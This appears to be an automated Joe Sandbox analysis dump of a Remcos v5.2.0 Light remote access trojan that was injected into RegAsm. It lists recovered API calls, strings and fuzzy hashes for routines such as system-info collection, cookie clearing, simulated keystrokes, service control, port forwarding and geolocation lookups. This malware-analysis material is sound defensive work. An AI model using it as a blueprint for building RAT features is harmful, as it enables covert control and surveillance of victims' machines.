                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 2956720200-749203953
                                  • Opcode ID: 9ae08c32307eef31fb7c5aaa0f3b11f8ecc84999c156523786cfad43494257fa
                                  • Instruction ID: d860b0a56e94f76641ef76a8e7973dae8c749e614e4092a13e3eb52c91ae7d72
                                  • Opcode Fuzzy Hash: 9ae08c32307eef31fb7c5aaa0f3b11f8ecc84999c156523786cfad43494257fa
                                  • Instruction Fuzzy Hash: 3F41C3326043009BCB00BF76DD9A86F7BA9AB85704F00053EF906A71D1EE7CDA09C75A
                                  APIs
                                  • _free.LIBCMT ref: 0043C534
                                    • Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                    • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                  • _free.LIBCMT ref: 0043C540
                                  • _free.LIBCMT ref: 0043C54B
                                  • _free.LIBCMT ref: 0043C556
                                  • _free.LIBCMT ref: 0043C561
                                  • _free.LIBCMT ref: 0043C56C
                                  • _free.LIBCMT ref: 0043C577
                                  • _free.LIBCMT ref: 0043C582
                                  • _free.LIBCMT ref: 0043C58D
                                  • _free.LIBCMT ref: 0043C59B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
                                  • Instruction ID: c50bc2256fd40bb6b8c60e6ce880829711fb0bf02a5bbaa2345148bc22db0d7c
                                  • Opcode Fuzzy Hash: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
                                  • Instruction Fuzzy Hash: D211A776504108BFCB11EF59C892DDD3BA5EF08354F4150AAFB188B222DB35DA509FC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 65535$udp
                                  • API String ID: 0-1267037602
                                  • Opcode ID: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                  • Instruction ID: 84486ce2f1bb3f426333e4d3ad8243f8e990da5f3cf8287c7bce91a3dc9f0a7e
                                  • Opcode Fuzzy Hash: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                  • Instruction Fuzzy Hash: EE51E335600205ABDB248F2AD809BBB3764AB45340F088C7BEC45A73D1E73ECD618A69
                                  APIs
                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044A50F), ref: 004499E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DecodePointer
                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                  • API String ID: 3527080286-3064271455
                                  • Opcode ID: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                  • Instruction ID: 110063cd0ce05d1060d43825b6a991279bdf802adc29d45c0d9515e70b7eb71e
                                  • Opcode Fuzzy Hash: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                  • Instruction Fuzzy Hash: F751AF7090054ACBEF10DF68E94C4AEBBB0FB49315F60418BD880B7255CB79AD28EB1D
                                  APIs
                                    • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004108D0
                                    • Part of subcall function 004149E0: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
                                  • Sleep.KERNEL32(00000064), ref: 004108FC
                                  • DeleteFileW.KERNEL32(00000000), ref: 0041092C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 2701014334-2001430897
                                  • Opcode ID: 008cc4f7b0c914fe1523b4adbe8bd57e3db729cf936fec5275829b02cea6f498
                                  • Instruction ID: e682aa32545da1075197413550dedd9039f207d5310d298ab226810ec4c53ad6
                                  • Opcode Fuzzy Hash: 008cc4f7b0c914fe1523b4adbe8bd57e3db729cf936fec5275829b02cea6f498
                                  • Instruction Fuzzy Hash: 0A314F719101189ADB08FBA1DC92EEE7724AF50705F40017FF506770D2EE785E8ACA5D
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041597B
                                    • Part of subcall function 00415A14: RegisterClassExA.USER32(00000030), ref: 00415A60
                                    • Part of subcall function 00415A14: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                    • Part of subcall function 00415A14: GetLastError.KERNEL32 ref: 00415A85
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004159B2
                                  • lstrcpynA.KERNEL32(00467A60,Remcos,00000080), ref: 004159CC
                                  • Shell_NotifyIconA.SHELL32(00000000,00467A48), ref: 004159E2
                                  • TranslateMessage.USER32(?), ref: 004159EE
                                  • DispatchMessageA.USER32(?), ref: 004159F8
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00415A05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID: Remcos
                                  • API String ID: 1970332568-165870891
                                  • Opcode ID: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                  • Instruction ID: c8a284d08dd33ebe47548fa3d4bc7f9e15ad04814d582944d5373042d6cfd863
                                  • Opcode Fuzzy Hash: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                  • Instruction Fuzzy Hash: E5018471944248EBD7109FE1ED4CEDF7BBCEB86B09F00013AF50592560EBB84545CB6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e30597776c45aa2582d7b1d23d143fd14eda843a11527f82129a35e01b5cacec
                                  • Instruction ID: 47e32140ea42008b6e2fbe39e058ee49646603e651697782d258c77751b7765d
                                  • Opcode Fuzzy Hash: e30597776c45aa2582d7b1d23d143fd14eda843a11527f82129a35e01b5cacec
                                  • Instruction Fuzzy Hash: 60C1FA70E042459FEF11DFA8D841BAEBBB0BF4D310F14419AEA14A7392C7789951CF69
                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004473CE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004471A1
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 00447224
                                  • __alloca_probe_16.LIBCMT ref: 0044725C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004473CE,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472B7
                                  • __alloca_probe_16.LIBCMT ref: 00447306
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472CE
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044734A
                                  • __freea.LIBCMT ref: 00447375
                                  • __freea.LIBCMT ref: 00447381
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                  • String ID:
                                  • API String ID: 3256262068-0
                                  • Opcode ID: c8600d0b581eb7119826d261fca458afb9551a92d86b143f35584071ee995311
                                  • Instruction ID: 0a2115d0f49871cf642610963fb2ef61daaf79bca83d118575b9579562c159e9
                                  • Opcode Fuzzy Hash: c8600d0b581eb7119826d261fca458afb9551a92d86b143f35584071ee995311
                                  • Instruction Fuzzy Hash: 0991B271E082169AEB208FA5CC81EEF7BB5AB09354F14465BED01E6341D73CDC42D7A8
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • _memcmp.LIBVCRUNTIME ref: 0043AAF1
                                  • _free.LIBCMT ref: 0043AB62
                                  • _free.LIBCMT ref: 0043AB7B
                                  • _free.LIBCMT ref: 0043ABAD
                                  • _free.LIBCMT ref: 0043ABB6
                                  • _free.LIBCMT ref: 0043ABC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast$_abort_memcmp
                                  • String ID: C
                                  • API String ID: 1679612858-1037565863
                                  • Opcode ID: 8f8f0cdc7adba91ced7f4618c4b3471fa8c11071e8b07e19bac8f0bcd20b1c00
                                  • Instruction ID: c4661d0a74ae8308ead59343ecbb51613a8cf0527b1561a261068459944c83cc
                                  • Opcode Fuzzy Hash: 8f8f0cdc7adba91ced7f4618c4b3471fa8c11071e8b07e19bac8f0bcd20b1c00
                                  • Instruction Fuzzy Hash: 0BB15975A012199FDB24DF18C884BAEB7B5FF48304F1045AEE949A7350E734AE90CF85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: tcp$udp
                                  • API String ID: 0-3725065008
                                  • Opcode ID: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                  • Instruction ID: 2cfa6809cb724154de7c5257ff097518599a902fbcec9cb31fa9a61e5e6da04f
                                  • Opcode Fuzzy Hash: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                  • Instruction Fuzzy Hash: 54817E70A00216EBDF248F96C94566A7BB1EF04315F14887BE805B73D0E778CD61DB99
                                  APIs
                                    • Part of subcall function 0041133B: __EH_prolog.LIBCMT ref: 00411340
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004111EB
                                  • CloseHandle.KERNEL32(00000000), ref: 004111F4
                                  • DeleteFileA.KERNEL32(00000000), ref: 00411203
                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004111B7
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                  • String ID: <$@$Temp
                                  • API String ID: 1704390241-1032778388
                                  • Opcode ID: 1ce1cf3da0da969298fcf9dce4e914b28ddf8fb34e6c32fd8aacfb729fc4a8e4
                                  • Instruction ID: f7fd7360526dce7b80c1252073eef177887262dc2d48c10ab8877ccdce07747f
                                  • Opcode Fuzzy Hash: 1ce1cf3da0da969298fcf9dce4e914b28ddf8fb34e6c32fd8aacfb729fc4a8e4
                                  • Instruction Fuzzy Hash: 3B41B431A002099BDB15FB61DD5AAEE7734AF10305F40417EF606760E2EF781E89CB99
                                  APIs
                                    • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00404E61
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA9
                                  • CloseHandle.KERNEL32(00000000), ref: 00404EE3
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00404EFB
                                  • CloseHandle.KERNEL32(?), ref: 00404F1F
                                  • DeleteFileW.KERNEL32(00000000), ref: 00404F2E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                  • String ID: .part
                                  • API String ID: 820096542-3499674018
                                  • Opcode ID: 6aefee781c8191061b57c7c32ce252a4d3636f2671c29e5a59886ede381611fb
                                  • Instruction ID: 7c0ed4d063a9e04155bbcfc9f8ad653c8c905adfc315915fd9f293c083df040d
                                  • Opcode Fuzzy Hash: 6aefee781c8191061b57c7c32ce252a4d3636f2671c29e5a59886ede381611fb
                                  • Instruction Fuzzy Hash: 54315EB5D00219ABCB04EFA5DD468EEB778FB44315F1085BAFA01B7190DB746E44CB98
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00412D7B,00000000), ref: 004131D5
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00412D7B,00000000), ref: 004131E9
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 004131F6
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412D7B,00000000), ref: 00413205
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 00413217
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 0041321A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID: {-A
                                  • API String ID: 221034970-2249487690
                                  • Opcode ID: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                  • Instruction ID: 7e647667e6c08bc6e9fb8e637e579d569d58eb8f592d23d6fbd5c62d0da24c2c
                                  • Opcode Fuzzy Hash: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                  • Instruction Fuzzy Hash: C6F046359012187BD3206F659C4AEBF3B6CCB86356F000026FE0893141DF388E4685F8
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00436E4A,00436E4A,?,?,?,0043CE68,00000001,00000001,36E85006), ref: 0043CC71
                                  • __alloca_probe_16.LIBCMT ref: 0043CCA9
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043CE68,00000001,00000001,36E85006,?,?,?), ref: 0043CCF7
                                  • __alloca_probe_16.LIBCMT ref: 0043CD8E
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,36E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CDF1
                                  • __freea.LIBCMT ref: 0043CDFE
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  • __freea.LIBCMT ref: 0043CE07
                                  • __freea.LIBCMT ref: 0043CE2C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                  • String ID:
                                  • API String ID: 2597970681-0
                                  • Opcode ID: 42cc483bc2611a049f0cb3c7574fc9816d8302f951a5dbce1ebaaaff924a952f
                                  • Instruction ID: 16551e4f37cd50cf7fbfb2aa30d37855c537b24eff3af83edd6829f607421f63
                                  • Opcode Fuzzy Hash: 42cc483bc2611a049f0cb3c7574fc9816d8302f951a5dbce1ebaaaff924a952f
                                  • Instruction Fuzzy Hash: CF51E772600216ABEB258F65CCC2EBF7BA9EB48754F15562AFC05E6240DB38DC50C798
                                  APIs
                                  • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000003,00000004), ref: 00412897
                                  • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128BB
                                  • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128DE
                                  • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128FB
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0041291A
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0041293C
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0041295C
                                  • SendInput.USER32(00000001,?), ref: 0041297D
                                    • Part of subcall function 00412844: MapVirtualKeyA.USER32(00000000,00000000), ref: 0041284A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend$Virtual
                                  • String ID:
                                  • API String ID: 1167301434-0
                                  • Opcode ID: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
                                  • Instruction ID: 24ca5d00d02f7653e18acf6bc68dbc8fd38b51cab6d69bb73ca3533017ab6641
                                  • Opcode Fuzzy Hash: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
                                  • Instruction Fuzzy Hash: 8D318771D4034CA6EB14EBE5DD01FEFBBB89F59700F00011BE500B7191D6F95A558BA5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4201588131-168337528
                                  • Opcode ID: 41922c924f5a5da3833a84a67b86ac19aba2cda6983a8387f970e2bc3ff8da04
                                  • Instruction ID: 4c107d70a221628ff284c34145cd556a99705f34e20cdd27ed2f6698d2395ea7
                                  • Opcode Fuzzy Hash: 41922c924f5a5da3833a84a67b86ac19aba2cda6983a8387f970e2bc3ff8da04
                                  • Instruction Fuzzy Hash: 4C418131A147109BC604BB35CD5AA6E3A95AB41714F40463FF905BB2D2EFBC9A09C78F
                                  APIs
                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043E3F5,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DCC2
                                  • __fassign.LIBCMT ref: 0043DD3D
                                  • __fassign.LIBCMT ref: 0043DD58
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043DD7E
                                  • WriteFile.KERNEL32(?,00000000,00000000,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DD9D
                                  • WriteFile.KERNEL32(?,0044A1E5,00000001,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DDD6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
                                  • Instruction ID: 1191330dd9651e550a9c57302bd25a2e4a4b496a4be768e30e66c30c5805dab2
                                  • Opcode Fuzzy Hash: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
                                  • Instruction Fuzzy Hash: 8B51B170E00609AFCB10CFA8E881AEEBBB9FF1D300F14512AE555E7291D7749951CB69
                                  APIs
                                    • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
                                    • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
                                    • Part of subcall function 0040D033: RegCloseKey.KERNEL32(?), ref: 0040D07F
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 00408457
                                  • PathFileExistsA.SHLWAPI(?), ref: 00408464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 1133728706-4073444585
                                  • Opcode ID: b0681254ba728135d1e4a5a31b490442c53c3cedf1b70f8c56d59d094332a86b
                                  • Instruction ID: 48a5cd8e34f4168e4ceb4a97fd5a88dfb481768987e4111ae43b07c44258e77f
                                  • Opcode Fuzzy Hash: b0681254ba728135d1e4a5a31b490442c53c3cedf1b70f8c56d59d094332a86b
                                  • Instruction Fuzzy Hash: 1021C370A0021596CB04FBB1CD5BDEE7728AF55309F80003FB942772C2EE7C5949C699
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88791158df2037fbdc827d3f87e260f3fb51ca9734febcded2cc23b58a1a313a
                                  • Instruction ID: 3624dff07b2ed831ebec2a5ad87dd854ecd10989a5fe549f38fdbb033019db15
                                  • Opcode Fuzzy Hash: 88791158df2037fbdc827d3f87e260f3fb51ca9734febcded2cc23b58a1a313a
                                  • Instruction Fuzzy Hash: 8B1127725041147BEB206FB69C0996F7A6CEBCA775F10066FF825D2291DA38C810866A
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040BD4B
                                  • int.LIBCPMT ref: 0040BD5E
                                    • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
                                    • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
                                  • std::locale::_Getfacet.LIBCPMT ref: 0040BD67
                                  • std::_Facet_Register.LIBCPMT ref: 0040BD9E
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDA7
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040BDC5
                                  • __Init_thread_footer.LIBCMT ref: 0040BE06
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                  • String ID:
                                  • API String ID: 2409581025-0
                                  • Opcode ID: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
                                  • Instruction ID: f9d61c3bcc2ce2a12a6fed84a452ab5d8f8c1208be56ff46f61e8ed68a895f59
                                  • Opcode Fuzzy Hash: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
                                  • Instruction Fuzzy Hash: 6221A432A00624DBCB14EBA9E9429DE7768DF45324B60017BF501A73D2EFB99D018BDD
                                  APIs
                                  • AllocConsole.KERNEL32(00467E5C), ref: 00415131
                                  • ShowWindow.USER32(00000000,00000000), ref: 0041514A
                                  • SetConsoleOutputCP.KERNEL32(000004E4,?,?,?,00000000,771B0F10), ref: 00415171
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AllocOutputShowWindow
                                  • String ID: Remcos v$5.2.0 Light$CONOUT$
                                  • API String ID: 2425139147-120711850
                                  • Opcode ID: ba906ace53b3a24a910202293975b49cad63cb15e9f8c50223eac9e3bac3fbb8
                                  • Instruction ID: dee782cc1d132fa0a2354ebe19e16e3023016d6370a6d64ff70c1a6108a5807a
                                  • Opcode Fuzzy Hash: ba906ace53b3a24a910202293975b49cad63cb15e9f8c50223eac9e3bac3fbb8
                                  • Instruction Fuzzy Hash: 7F115B72D047006ACA11EF955C06FCBB7A99F92B01F100563FC48BF142D6E6294A86AD
                                  APIs
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00413A88
                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00413A9F
                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00413AB6
                                  • InternetCloseHandle.WININET(00000000), ref: 00413AF6
                                  • InternetCloseHandle.WININET(?), ref: 00413AFB
                                  Strings
                                  • http://geoplugin.net/json.gp, xrefs: 00413A96
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleOpen$FileRead
                                  • String ID: http://geoplugin.net/json.gp
                                  • API String ID: 3121278467-91888290
